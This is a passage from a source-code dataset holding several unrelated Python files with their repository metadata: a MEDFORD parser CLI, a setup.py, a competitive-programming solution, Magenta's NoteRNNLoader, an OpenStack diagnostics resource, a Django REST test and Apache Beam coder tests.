OTHER = 'OTHER'
BCODMO = 'BCODMO'
BAGIT = 'BAGIT'
def __str__(self):
return self.value
class ParserMode(Enum) :
validate = 'validate'
compile = 'compile'
def __str__(self):
return self.value
# Command Line Arguments
# TODO: How can I make it require an MFDMode value, but lowercase is OK?
# Do I actually care?
parser = argparse.ArgumentParser()
parser.add_argument("-m", "--mode", type=MFDMode, choices=list(MFDMode), default=MFDMode.OTHER, required=True,
help="Which Output mode the MEDFORD parser should validate or compile for.")
parser.add_argument("action", type=ParserMode, choices=list(ParserMode),
help="Whether the MEDFORD parser is only validating or actually compiling (performing any necessary adjustments or actions for the appropriate format, such as creating a Bag for the BagIt mode.)")
parser.add_argument("file", type=str, help="The input MEDFORD file to validate or compile.")
parser.add_argument("--write_json", action="store_true", default=False,
help="Write a JSON file of the internal representation of the MEDFORD file beside the input MEDFORD file.")
parser.add_argument("--debug", "-d", "-v", action="store_true", default=False,
help="Enable verbose mode for MEDFORD, enabling various debug messages during runtime.")
def runMedford(filename, output_json, mode):
class FieldError(Exception):
pass
details = []
with open(filename, 'r') as f:
all_lines = f.readlines()
dr = None
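# Parse the MEDFORD file line by line into detail objects, skipping blank lines.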
for i, line in enumerate(all_lines):
if(line.strip() != "") :
# TODO: move the details collection logic to detail? I don't like that we have to pull the typing here.
dr = detail.FromLine(line, i+1, dr)
if isinstance(dr, detail_return) :
if dr.is_novel :
details.append(dr.detail)
parser = detailparser(details)
final_dict = parser.export()
if mode == MFDMode.BCODMO:
p = BCODMO(**final_dict)
elif mode == MFDMode.BAGIT:
p = BagIt(**final_dict)
runBagitMode(p, filename)
elif mode == MFDMode.OTHER:
p = Entity(**final_dict)
else :
raise Exception("Medford is running in an unsupported mode.")
if(output_json) :
with open(filename + ".JSON", 'w') as f:
json.dump(final_dict, f, indent=2)
if __name__ == "__main__":
args = parser.parse_args()
runMedford(args.file, args.write_json, args.mode)
| 36.68
| 200
| 0.668121
|
629b50479c0720022e4fb0097f8e9a3847140505
| 710
|
py
|
Python
|
autograder-master/setup.py
|
Diana1320622/AILabs
|
315a6f4b8f8dd60e4f53d348e06e23b4d827d179
|
[
"MIT"
] | null | null | null |
autograder-master/setup.py
|
Diana1320622/AILabs
|
315a6f4b8f8dd60e4f53d348e06e23b4d827d179
|
[
"MIT"
] | null | null | null |
autograder-master/setup.py
|
Diana1320622/AILabs
|
315a6f4b8f8dd60e4f53d348e06e23b4d827d179
|
[
"MIT"
] | null | null | null |
from setuptools import setup
setup(name='autograder',
version='0.1',
description='Autograder for programming projects',
url='http://github.com/rhomeister/autograder',
author='Ruben Stranders',
author_email='r.stranders@gmail.com',
license='MIT',
packages=['autograder',
'autograder.checks',
'autograder.analysis'],
install_requires=[
'gitpython',
'gitinspector',
'numpy',
'colorama'
],
entry_points = {
'console_scripts': [
'autograder=autograder.cli:main'
],
},
zip_safe=False
)
| 26.296296
| 58
| 0.508451
|
a3c1fa0b66007b2ddfb9e06b74406802018a8fea
| 227
|
py
|
Python
|
jp.atcoder/abc215/abc215_c/30948214.py
|
kagemeka/atcoder-submissions
|
91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e
|
[
"MIT"
] | 1
|
2022-02-09T03:06:25.000Z
|
2022-02-09T03:06:25.000Z
|
jp.atcoder/abc215/abc215_c/30948214.py
|
kagemeka/atcoder-submissions
|
91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e
|
[
"MIT"
] | 1
|
2022-02-05T22:53:18.000Z
|
2022-02-09T01:29:30.000Z
|
jp.atcoder/abc215/abc215_c/30948214.py
|
kagemeka/atcoder-submissions
|
91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e
|
[
"MIT"
] | null | null | null |
import itertools
def main() -> None:
s, k = input().split()
k = int(k)
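# Enumerate the distinct permutations of s in lexicographic order and print the k-th one (1-indexed).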
a = sorted(set(map(lambda x: "".join(x), itertools.permutations(s))))
print(a[k - 1])
if __name__ == "__main__":
main()
| 17.461538
| 74
| 0.528634
|
116b69777cb64b4639ff188121fd40ee95abb685
| 16,195
|
py
|
Python
|
magenta/models/rl_tuner/note_rnn_loader.py
|
jopdorp/classical-polyphony-rnn
|
8fcdce4c974b1c5a463cbd30ea85bdf98d4f8bde
|
[
"Apache-2.0"
] | null | null | null |
magenta/models/rl_tuner/note_rnn_loader.py
|
jopdorp/classical-polyphony-rnn
|
8fcdce4c974b1c5a463cbd30ea85bdf98d4f8bde
|
[
"Apache-2.0"
] | null | null | null |
magenta/models/rl_tuner/note_rnn_loader.py
|
jopdorp/classical-polyphony-rnn
|
8fcdce4c974b1c5a463cbd30ea85bdf98d4f8bde
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines a class and operations for the MelodyRNN model.
Note RNN Loader allows a basic melody prediction LSTM RNN model to be loaded
from a checkpoint file, primed, and used to predict next notes.
This class can be used as the q_network and target_q_network for the RLTuner
class.
The graph structure of this model is similar to basic_rnn, but more flexible.
It allows you to either train it with data from a queue, or just 'call' it to
produce the next action.
It also provides the ability to add the model's graph to an existing graph as a
subcomponent, and then load variables from a checkpoint file into only that
piece of the overall graph.
These functions are necessary for use with the RL Tuner class.
"""
import os
# internal imports
import numpy as np
import tensorflow as tf
import magenta
from magenta.common import sequence_example_lib
from magenta.models.rl_tuner import rl_tuner_ops
from magenta.models.shared import events_rnn_graph
from magenta.music import melodies_lib
from magenta.music import midi_io
from magenta.music import sequences_lib
class NoteRNNLoader(object):
"""Builds graph for a Note RNN and instantiates weights from a checkpoint.
Loads weights from a previously saved checkpoint file corresponding to a pre-
trained basic_rnn model. Has functions that allow it to be primed with a MIDI
melody, and allow it to be called to produce its predictions for the next
note in a sequence.
Used as part of the RLTuner class.
"""
def __init__(self, graph, scope, checkpoint_dir, checkpoint_file=None,
midi_primer=None, training_file_list=None, hparams=None,
note_rnn_type='default', checkpoint_scope='rnn_model'):
"""Initialize by building the graph and loading a previous checkpoint.
Args:
graph: A tensorflow graph where the MelodyRNN's graph will be added.
scope: The tensorflow scope where this network will be saved.
checkpoint_dir: Path to the directory where the checkpoint file is saved.
checkpoint_file: Path to a checkpoint file to be used if none can be
found in the checkpoint_dir
midi_primer: Path to a single midi file that can be used to prime the
model.
training_file_list: List of paths to tfrecord files containing melody
training data.
hparams: A tf_lib.HParams object. Must match the hparams used to create
the checkpoint file.
note_rnn_type: If 'default', will use the basic LSTM described in the
research paper. If 'basic_rnn', will assume the checkpoint is from a
Magenta basic_rnn model.
checkpoint_scope: The scope in which the model was originally defined
when it was first trained.
"""
self.graph = graph
self.session = None
self.scope = scope
self.batch_size = 1
self.midi_primer = midi_primer
self.checkpoint_scope = checkpoint_scope
self.note_rnn_type = note_rnn_type
self.training_file_list = training_file_list
self.checkpoint_dir = checkpoint_dir
self.checkpoint_file = checkpoint_file
if hparams is not None:
tf.logging.info('Using custom hparams')
self.hparams = hparams
else:
tf.logging.info('Empty hparams string. Using defaults')
self.hparams = rl_tuner_ops.default_hparams()
self.build_graph()
self.state_value = self.get_zero_state()
if midi_primer is not None:
self.load_primer()
self.variable_names = rl_tuner_ops.get_variable_names(self.graph,
self.scope)
self.transpose_amount = 0
def get_zero_state(self):
"""Gets an initial state of zeros of the appropriate size.
Required size is based on the model's internal RNN cell.
Returns:
A matrix of batch_size x cell size zeros.
"""
return np.zeros((self.batch_size, self.cell.state_size))
def restore_initialize_prime(self, session):
"""Saves the session, restores variables from checkpoint, primes model.
Model is primed with its default midi file.
Args:
session: A tensorflow session.
"""
self.session = session
self.restore_vars_from_checkpoint(self.checkpoint_dir)
self.prime_model()
def initialize_and_restore(self, session):
"""Saves the session, restores variables from checkpoint.
Args:
session: A tensorflow session.
"""
self.session = session
self.restore_vars_from_checkpoint(self.checkpoint_dir)
def initialize_new(self, session=None):
"""Saves the session, initializes all variables to random values.
Args:
session: A tensorflow session.
"""
with self.graph.as_default():
if session is None:
self.session = tf.Session(graph=self.graph)
else:
self.session = session
self.session.run(tf.initialize_all_variables())
def get_variable_name_dict(self):
"""Constructs a dict mapping the checkpoint variables to those in new graph.
Returns:
A dict mapping variable names in the checkpoint to variables in the graph.
"""
var_dict = dict()
for var in self.variables():
inner_name = rl_tuner_ops.get_inner_scope(var.name)
inner_name = rl_tuner_ops.trim_variable_postfixes(inner_name)
if '/Adam' in var.name:
# TODO(lukaszkaiser): investigate the problem here and remove this hack.
pass
elif self.note_rnn_type == 'basic_rnn':
var_dict[inner_name] = var
else:
var_dict[self.checkpoint_scope + '/' + inner_name] = var
return var_dict
def build_graph(self):
"""Constructs the portion of the graph that belongs to this model."""
tf.logging.info('Initializing melody RNN graph for scope %s', self.scope)
with self.graph.as_default():
with tf.device(lambda op: ''):
with tf.variable_scope(self.scope):
# Make an LSTM cell with the number and size of layers specified in
# hparams.
if self.note_rnn_type == 'basic_rnn':
self.cell = events_rnn_graph.make_rnn_cell(
self.hparams.rnn_layer_sizes)
else:
self.cell = rl_tuner_ops.make_rnn_cell(self.hparams.rnn_layer_sizes)
# Shape of melody_sequence is batch size, melody length, number of
# output note actions.
self.melody_sequence = tf.placeholder(tf.float32,
[None, None,
self.hparams.one_hot_length],
name='melody_sequence')
self.lengths = tf.placeholder(tf.int32, [None], name='lengths')
self.initial_state = tf.placeholder(tf.float32,
[None, self.cell.state_size],
name='initial_state')
if self.training_file_list is not None:
# Set up a tf queue to read melodies from the training data tfrecord
(self.train_sequence,
self.train_labels,
self.train_lengths) = sequence_example_lib.get_padded_batch(
self.training_file_list, self.hparams.batch_size,
self.hparams.one_hot_length)
# Closure function is used so that this part of the graph can be
# re-run in multiple places, such as __call__.
def run_network_on_melody(m_seq,
lens,
initial_state,
swap_memory=True,
parallel_iterations=1):
"""Internal function that defines the RNN network structure.
Args:
m_seq: A batch of melody sequences of one-hot notes.
lens: Lengths of the melody_sequences.
initial_state: Vector representing the initial state of the RNN.
swap_memory: Uses more memory and is faster.
parallel_iterations: Argument to tf.nn.dynamic_rnn.
Returns:
Output of network (either softmax or logits) and RNN state.
"""
outputs, final_state = tf.nn.dynamic_rnn(
self.cell,
m_seq,
sequence_length=lens,
initial_state=initial_state,
swap_memory=swap_memory,
parallel_iterations=parallel_iterations)
outputs_flat = tf.reshape(outputs,
[-1, self.hparams.rnn_layer_sizes[-1]])
linear_layer = (tf.contrib.layers.linear
if self.note_rnn_type == 'basic_rnn'
else tf.contrib.layers.legacy_linear)
logits_flat = linear_layer(
outputs_flat, self.hparams.one_hot_length)
return logits_flat, final_state
(self.logits, self.state_tensor) = run_network_on_melody(
self.melody_sequence, self.lengths, self.initial_state)
self.softmax = tf.nn.softmax(self.logits)
self.run_network_on_melody = run_network_on_melody
if self.training_file_list is not None:
# Does not recreate the model architecture but rather uses it to feed
# data from the training queue through the model.
with tf.variable_scope(self.scope, reuse=True):
zero_state = self.cell.zero_state(
batch_size=self.hparams.batch_size, dtype=tf.float32)
(self.train_logits, self.train_state) = run_network_on_melody(
self.train_sequence, self.train_lengths, zero_state)
self.train_softmax = tf.nn.softmax(self.train_logits)
def restore_vars_from_checkpoint(self, checkpoint_dir):
"""Loads model weights from a saved checkpoint.
Args:
checkpoint_dir: Directory which contains a saved checkpoint of the
model.
"""
tf.logging.info('Restoring variables from checkpoint')
var_dict = self.get_variable_name_dict()
with self.graph.as_default():
saver = tf.train.Saver(var_list=var_dict)
tf.logging.info('Checkpoint dir: %s', checkpoint_dir)
checkpoint_file = tf.train.latest_checkpoint(checkpoint_dir)
if checkpoint_file is None:
tf.logging.warn("Can't find checkpoint file, using %s",
self.checkpoint_file)
checkpoint_file = self.checkpoint_file
tf.logging.info('Checkpoint file: %s', checkpoint_file)
saver.restore(self.session, checkpoint_file)
def load_primer(self):
"""Loads default MIDI primer file.
Also assigns the steps per bar of this file to be the model's defaults.
"""
if not os.path.exists(self.midi_primer):
tf.logging.warn('ERROR! No such primer file exists! %s', self.midi_primer)
return
self.primer_sequence = midi_io.midi_file_to_sequence_proto(self.midi_primer)
quantized_seq = sequences_lib.quantize_note_sequence(
self.primer_sequence, steps_per_quarter=4)
extracted_melodies, _ = melodies_lib.extract_melodies(quantized_seq,
min_bars=0,
min_unique_pitches=1)
self.primer = extracted_melodies[0]
self.steps_per_bar = self.primer.steps_per_bar
def prime_model(self):
"""Primes the model with its default midi primer."""
with self.graph.as_default():
tf.logging.debug('Priming the model with MIDI file %s', self.midi_primer)
# Convert primer Melody to model inputs.
encoder = magenta.music.OneHotEventSequenceEncoderDecoder(
magenta.music.MelodyOneHotEncoding(
min_note=rl_tuner_ops.MIN_NOTE,
max_note=rl_tuner_ops.MAX_NOTE))
seq = encoder.encode(self.primer)
features = seq.feature_lists.feature_list['inputs'].feature
primer_input = [list(i.float_list.value) for i in features]
# Run model over primer sequence.
primer_input_batch = np.tile([primer_input], (self.batch_size, 1, 1))
self.state_value, softmax = self.session.run(
[self.state_tensor, self.softmax],
feed_dict={self.initial_state: self.state_value,
self.melody_sequence: primer_input_batch,
self.lengths: np.full(self.batch_size,
len(self.primer),
dtype=int)})
priming_output = softmax[-1, :]
self.priming_note = self.get_note_from_softmax(priming_output)
def get_note_from_softmax(self, softmax):
"""Extracts a one-hot encoding of the most probable note.
Args:
softmax: Softmax probabilities over possible next notes.
Returns:
One-hot encoding of most probable note.
"""
note_idx = np.argmax(softmax)
note_enc = rl_tuner_ops.make_onehot([note_idx], rl_tuner_ops.NUM_CLASSES)
return np.reshape(note_enc, (rl_tuner_ops.NUM_CLASSES))
def __call__(self):
"""Allows the network to be called, as in the following code snippet!
q_network = MelodyRNN(...)
q_network()
The q_network() operation can then be placed into a larger graph as a tf op.
Note that to get actual values from call, must do session.run and feed in
melody_sequence, lengths, and initial_state in the feed dict.
Returns:
Either softmax probabilities over notes, or raw logit scores.
"""
with self.graph.as_default():
with tf.variable_scope(self.scope, reuse=True):
logits, self.state_tensor = self.run_network_on_melody(
self.melody_sequence, self.lengths, self.initial_state)
return logits
def run_training_batch(self):
"""Runs one batch of training data through the model.
Uses a queue runner to pull one batch of data from the training files
and run it through the model.
Returns:
A batch of softmax probabilities and model state vectors.
"""
if self.training_file_list is None:
tf.logging.warn('No training file path was provided, cannot run training '
'batch')
return
coord = tf.train.Coordinator()
tf.train.start_queue_runners(sess=self.session, coord=coord)
softmax, state, lengths = self.session.run([self.train_softmax,
self.train_state,
self.train_lengths])
coord.request_stop()
return softmax, state, lengths
def get_next_note_from_note(self, note):
"""Given a note, uses the model to predict the most probable next note.
Args:
note: A one-hot encoding of the note.
Returns:
Next note in the same format.
"""
with self.graph.as_default():
with tf.variable_scope(self.scope, reuse=True):
singleton_lengths = np.full(self.batch_size, 1, dtype=int)
input_batch = np.reshape(note,
(self.batch_size, 1, rl_tuner_ops.NUM_CLASSES))
softmax, self.state_value = self.session.run(
[self.softmax, self.state_tensor],
{self.melody_sequence: input_batch,
self.initial_state: self.state_value,
self.lengths: singleton_lengths})
return self.get_note_from_softmax(softmax)
def variables(self):
"""Gets names of all the variables in the graph belonging to this model.
Returns:
List of variable names.
"""
with self.graph.as_default():
return [v for v in tf.all_variables() if v.name.startswith(self.scope)]
| 38.467933
| 80
| 0.656314
|
24a8501ada933104d79b8353d10158cd47023268
| 2,085
|
py
|
Python
|
openstack/compute/v2/server_diagnostics.py
|
NeCTAR-RC/openstacksdk
|
60a24f6c4717a1f9a0e545c9a07e68afaedc5a27
|
[
"Apache-2.0"
] | 99
|
2018-03-28T15:41:45.000Z
|
2022-01-23T17:22:13.000Z
|
openstack/compute/v2/server_diagnostics.py
|
NeCTAR-RC/openstacksdk
|
60a24f6c4717a1f9a0e545c9a07e68afaedc5a27
|
[
"Apache-2.0"
] | 5
|
2018-05-25T16:54:23.000Z
|
2021-11-21T02:27:16.000Z
|
openstack/compute/v2/server_diagnostics.py
|
NeCTAR-RC/openstacksdk
|
60a24f6c4717a1f9a0e545c9a07e68afaedc5a27
|
[
"Apache-2.0"
] | 104
|
2018-04-06T14:33:54.000Z
|
2022-03-01T01:58:09.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack import resource
class ServerDiagnostics(resource.Resource):
resource_key = 'diagnostics'
base_path = '/servers/%(server_id)s/diagnostics'
# capabilities
allow_fetch = True
requires_id = False
#: Indicates whether or not a config drive was used for this server.
has_config_drive = resource.Body('config_drive')
#: The current state of the VM.
state = resource.Body('state')
#: The driver on which the VM is running.
driver = resource.Body('driver')
#: The hypervisor on which the VM is running.
hypervisor = resource.Body('hypervisor')
#: The hypervisor OS.
hypervisor_os = resource.Body('hypervisor_os')
#: The amount of time in seconds that the VM has been running.
uptime = resource.URI('uptime')
#: The number of vCPUs.
num_cpus = resource.URI('num_cpus')
#: The number of disks.
num_disks = resource.URI('num_disks')
#: The number of vNICs.
num_nics = resource.URI('num_nics')
#: The dictionary with information about VM memory usage.
memory_details = resource.URI('memory_details')
#: The list of dictionaries with detailed information about VM CPUs.
cpu_details = resource.URI('cpu_details')
#: The list of dictionaries with detailed information about VM disks.
disk_details = resource.URI('disk_details')
#: The list of dictionaries with detailed information about VM NICs.
nic_details = resource.URI('nic_details')
#: The ID for the server.
server_id = resource.URI('server_id')
| 39.339623
| 75
| 0.716067
|
3ec2f6763150555ec93e7b60b2f171cc50d2b4cd
| 2,167
|
py
|
Python
|
example/tests/test_performance.py
|
morenoh149/django-rest-framework-json-api
|
aea98ccc4f7bb9bad25d43d5631641b3671de53b
|
[
"BSD-2-Clause"
] | null | null | null |
example/tests/test_performance.py
|
morenoh149/django-rest-framework-json-api
|
aea98ccc4f7bb9bad25d43d5631641b3671de53b
|
[
"BSD-2-Clause"
] | null | null | null |
example/tests/test_performance.py
|
morenoh149/django-rest-framework-json-api
|
aea98ccc4f7bb9bad25d43d5631641b3671de53b
|
[
"BSD-2-Clause"
] | 2
|
2019-05-15T12:04:16.000Z
|
2019-05-21T09:37:38.000Z
|
from django.utils import timezone
from rest_framework.test import APITestCase
from example.factories import CommentFactory
from example.models import Author, Blog, Comment, Entry
class PerformanceTestCase(APITestCase):
def setUp(self):
self.author = Author.objects.create(name='Super powerful superhero', email='i.am@lost.com')
self.blog = Blog.objects.create(name='Some Blog', tagline="It's a blog")
self.other_blog = Blog.objects.create(name='Other blog', tagline="It's another blog")
self.first_entry = Entry.objects.create(
blog=self.blog,
headline='headline one',
body_text='body_text two',
pub_date=timezone.now(),
mod_date=timezone.now(),
n_comments=0,
n_pingbacks=0,
rating=3
)
self.second_entry = Entry.objects.create(
blog=self.blog,
headline='headline two',
body_text='body_text one',
pub_date=timezone.now(),
mod_date=timezone.now(),
n_comments=0,
n_pingbacks=0,
rating=1
)
self.comment = Comment.objects.create(entry=self.first_entry)
CommentFactory.create_batch(50)
def test_query_count_no_includes(self):
""" We expect a simple list view to issue only two queries.
1. The number of results in the set (e.g. a COUNT query),
only necessary because we're using PageNumberPagination
2. The SELECT query for the set
"""
with self.assertNumQueries(2):
response = self.client.get('/comments?page_size=25')
self.assertEqual(len(response.data['results']), 25)
def test_query_count_include_author(self):
""" We expect a list view with an include have three queries:
1. Primary resource COUNT query
2. Primary resource SELECT
3. Authors prefetched
3. Entries prefetched
"""
with self.assertNumQueries(4):
response = self.client.get('/comments?include=author&page_size=25')
self.assertEqual(len(response.data['results']), 25)
| 37.362069
| 99
| 0.624827
|
7cb3823a5a44579c9b4f754a8e29cc336df1a879
| 157
|
py
|
Python
|
spladder/__init__.py
|
ratschlab/spladder
|
8175c054a9b8fe7ae509f34fe5fb4d90a8cbe151
|
[
"BSD-3-Clause"
] | 96
|
2015-03-27T01:06:09.000Z
|
2022-03-20T05:56:54.000Z
|
spladder/__init__.py
|
ratschlab/spladder
|
8175c054a9b8fe7ae509f34fe5fb4d90a8cbe151
|
[
"BSD-3-Clause"
] | 160
|
2015-01-20T20:45:48.000Z
|
2022-03-31T14:48:05.000Z
|
spladder/__init__.py
|
ratschlab/spladder
|
8175c054a9b8fe7ae509f34fe5fb4d90a8cbe151
|
[
"BSD-3-Clause"
] | 42
|
2015-03-27T20:49:15.000Z
|
2021-12-21T12:39:42.000Z
|
# -*- coding: utf-8 -*-
"""Top-level package for spladder."""
__author__ = """Andre Kahles"""
__email__ = 'andre.kahles@inf.ethz.ch'
__version__ = '2.4.4'
| 19.625
| 38
| 0.636943
|
a87bf86f38b9e0fb3529ea16a67b83d398ec10d7
| 1,117
|
py
|
Python
|
api/waitlist/xup_history.py
|
AdoEditor/tdf-waitlist
|
9ed20497c23a2d70ffa90819d01358828c35a55e
|
[
"MIT"
] | null | null | null |
api/waitlist/xup_history.py
|
AdoEditor/tdf-waitlist
|
9ed20497c23a2d70ffa90819d01358828c35a55e
|
[
"MIT"
] | null | null | null |
api/waitlist/xup_history.py
|
AdoEditor/tdf-waitlist
|
9ed20497c23a2d70ffa90819d01358828c35a55e
|
[
"MIT"
] | null | null | null |
from flask import Blueprint, g
from . import auth
from .webutil import ViewReturn
from .data.database import FitHistory, Fitting, ImplantSet
from .data.evedb import name_of
bp = Blueprint("xup_history", __name__)
@bp.route("/api/history/xup")
@auth.login_required
@auth.select_character(override_permission="fit-history-view")
def get_xup_history() -> ViewReturn:
xups = []
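# Join each xup history row with its fitting and implant set, newest entries first.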
for history_line, fitting, implant_set in (
g.db.query(FitHistory, Fitting, ImplantSet)
.join(FitHistory.fit)
.join(FitHistory.implant_set)
.filter(FitHistory.character_id == g.character_id)
.order_by(FitHistory.id.desc())
):
xups.append(
{
"logged_at": history_line.logged_at,
"dna": fitting.dna,
"implants": list(
map(int, filter(lambda x: x, implant_set.implants.split(":")))
),
"hull": {
"id": fitting.hull,
"name": name_of(fitting.hull),
},
}
)
return {
"xups": xups,
}
| 28.641026
| 82
| 0.566697
|
f4c51804368cebee872b808f6237eca9c94a8edd
| 18,454
|
py
|
Python
|
sdks/python/apache_beam/coders/coders_test_common.py
|
charithe/beam
|
f085cb500730cf0c67c467ac55f92b3c59f52b39
|
[
"Apache-2.0"
] | 2
|
2020-06-25T00:47:43.000Z
|
2020-08-24T14:25:13.000Z
|
sdks/python/apache_beam/coders/coders_test_common.py
|
charithe/beam
|
f085cb500730cf0c67c467ac55f92b3c59f52b39
|
[
"Apache-2.0"
] | 10
|
2017-07-20T13:38:13.000Z
|
2017-08-03T15:49:24.000Z
|
sdks/python/apache_beam/coders/coders_test_common.py
|
charithe/beam
|
f085cb500730cf0c67c467ac55f92b3c59f52b39
|
[
"Apache-2.0"
] | 2
|
2020-06-22T11:17:44.000Z
|
2020-11-04T04:11:59.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Tests common to all coder implementations."""
from __future__ import absolute_import
import logging
import math
import sys
import unittest
from builtins import range
from apache_beam.coders import proto2_coder_test_messages_pb2 as test_message
from apache_beam.coders import coders
from apache_beam.internal import pickler
from apache_beam.runners import pipeline_context
from apache_beam.transforms import window
from apache_beam.transforms.window import GlobalWindow
from apache_beam.utils import timestamp
from apache_beam.utils import windowed_value
from apache_beam.utils.timestamp import MIN_TIMESTAMP
from . import observable
# Defined out of line for picklability.
class CustomCoder(coders.Coder):
def encode(self, x):
return str(x+1).encode('utf-8')
def decode(self, encoded):
return int(encoded) - 1
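# For illustration: encode() shifts the value up by one before serialising, so
# CustomCoder().encode(5) yields b'6' and CustomCoder().decode(b'6') recovers 5.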
class CodersTest(unittest.TestCase):
# These class methods ensure that we test each defined coder in both
# nested and unnested context.
@classmethod
def setUpClass(cls):
cls.seen = set()
cls.seen_nested = set()
# Method has been renamed in Python 3
if sys.version_info[0] < 3:
cls.assertCountEqual = cls.assertItemsEqual
@classmethod
def tearDownClass(cls):
standard = set(c
for c in coders.__dict__.values()
if isinstance(c, type) and issubclass(c, coders.Coder) and
'Base' not in c.__name__)
standard -= set([coders.Coder,
coders.AvroCoder,
coders.DeterministicProtoCoder,
coders.FastCoder,
coders.ProtoCoder,
coders.RunnerAPICoderHolder,
coders.ToStringCoder])
assert not standard - cls.seen, standard - cls.seen
assert not standard - cls.seen_nested, standard - cls.seen_nested
@classmethod
def _observe(cls, coder):
cls.seen.add(type(coder))
cls._observe_nested(coder)
@classmethod
def _observe_nested(cls, coder):
if isinstance(coder, coders.TupleCoder):
for c in coder.coders():
cls.seen_nested.add(type(c))
cls._observe_nested(c)
def check_coder(self, coder, *values, **kwargs):
context = kwargs.pop('context', pipeline_context.PipelineContext())
test_size_estimation = kwargs.pop('test_size_estimation', True)
assert not kwargs
self._observe(coder)
for v in values:
self.assertEqual(v, coder.decode(coder.encode(v)))
if test_size_estimation:
self.assertEqual(coder.estimate_size(v),
len(coder.encode(v)))
self.assertEqual(coder.estimate_size(v),
coder.get_impl().estimate_size(v))
self.assertEqual(coder.get_impl().get_estimated_size_and_observables(v),
(coder.get_impl().estimate_size(v), []))
copy1 = pickler.loads(pickler.dumps(coder))
copy2 = coders.Coder.from_runner_api(coder.to_runner_api(context), context)
for v in values:
self.assertEqual(v, copy1.decode(copy2.encode(v)))
if coder.is_deterministic():
self.assertEqual(copy1.encode(v), copy2.encode(v))
def test_custom_coder(self):
self.check_coder(CustomCoder(), 1, -10, 5)
self.check_coder(coders.TupleCoder((CustomCoder(), coders.BytesCoder())),
(1, b'a'), (-10, b'b'), (5, b'c'))
def test_pickle_coder(self):
self.check_coder(coders.PickleCoder(), 'a', 1, 1.5, (1, 2, 3))
def test_deterministic_coder(self):
coder = coders.FastPrimitivesCoder()
deterministic_coder = coders.DeterministicFastPrimitivesCoder(coder, 'step')
self.check_coder(deterministic_coder, 'a', 1, 1.5, (1, 2, 3))
with self.assertRaises(TypeError):
self.check_coder(deterministic_coder, dict())
with self.assertRaises(TypeError):
self.check_coder(deterministic_coder, [1, dict()])
self.check_coder(coders.TupleCoder((deterministic_coder, coder)),
(1, dict()), ('a', [dict()]))
def test_dill_coder(self):
cell_value = (lambda x: lambda: x)(0).__closure__[0]
self.check_coder(coders.DillCoder(), 'a', 1, cell_value)
self.check_coder(
coders.TupleCoder((coders.VarIntCoder(), coders.DillCoder())),
(1, cell_value))
def test_fast_primitives_coder(self):
coder = coders.FastPrimitivesCoder(coders.SingletonCoder(len))
self.check_coder(coder, None, 1, -1, 1.5, b'str\0str', u'unicode\0\u0101')
self.check_coder(coder, (), (1, 2, 3))
self.check_coder(coder, [], [1, 2, 3])
self.check_coder(coder, dict(), {'a': 'b'}, {0: dict(), 1: len})
self.check_coder(coder, set(), {'a', 'b'})
self.check_coder(coder, True, False)
self.check_coder(coder, len)
self.check_coder(coders.TupleCoder((coder,)), ('a',), (1,))
def test_fast_primitives_coder_large_int(self):
coder = coders.FastPrimitivesCoder()
self.check_coder(coder, 10 ** 100)
def test_bytes_coder(self):
self.check_coder(coders.BytesCoder(), b'a', b'\0', b'z' * 1000)
def test_varint_coder(self):
# Small ints.
self.check_coder(coders.VarIntCoder(), *range(-10, 10))
# Multi-byte encoding starts at 128
self.check_coder(coders.VarIntCoder(), *range(120, 140))
# Large values
MAX_64_BIT_INT = 0x7fffffffffffffff
self.check_coder(coders.VarIntCoder(),
*[int(math.pow(-1, k) * math.exp(k))
for k in range(0, int(math.log(MAX_64_BIT_INT)))])
def test_float_coder(self):
self.check_coder(coders.FloatCoder(),
*[float(0.1 * x) for x in range(-100, 100)])
self.check_coder(coders.FloatCoder(),
*[float(2 ** (0.1 * x)) for x in range(-100, 100)])
self.check_coder(coders.FloatCoder(), float('-Inf'), float('Inf'))
self.check_coder(
coders.TupleCoder((coders.FloatCoder(), coders.FloatCoder())),
(0, 1), (-100, 100), (0.5, 0.25))
def test_singleton_coder(self):
a = 'anything'
b = 'something else'
self.check_coder(coders.SingletonCoder(a), a)
self.check_coder(coders.SingletonCoder(b), b)
self.check_coder(coders.TupleCoder((coders.SingletonCoder(a),
coders.SingletonCoder(b))), (a, b))
def test_interval_window_coder(self):
self.check_coder(coders.IntervalWindowCoder(),
*[window.IntervalWindow(x, y)
for x in [-2**52, 0, 2**52]
for y in range(-100, 100)])
self.check_coder(
coders.TupleCoder((coders.IntervalWindowCoder(),)),
(window.IntervalWindow(0, 10),))
def test_timestamp_coder(self):
self.check_coder(coders.TimestampCoder(),
*[timestamp.Timestamp(micros=x) for x in (-1000, 0, 1000)])
self.check_coder(coders.TimestampCoder(),
timestamp.Timestamp(micros=-1234567000),
timestamp.Timestamp(micros=1234567000))
self.check_coder(coders.TimestampCoder(),
timestamp.Timestamp(micros=-1234567890123456000),
timestamp.Timestamp(micros=1234567890123456000))
self.check_coder(
coders.TupleCoder((coders.TimestampCoder(), coders.BytesCoder())),
(timestamp.Timestamp.of(27), b'abc'))
def test_timer_coder(self):
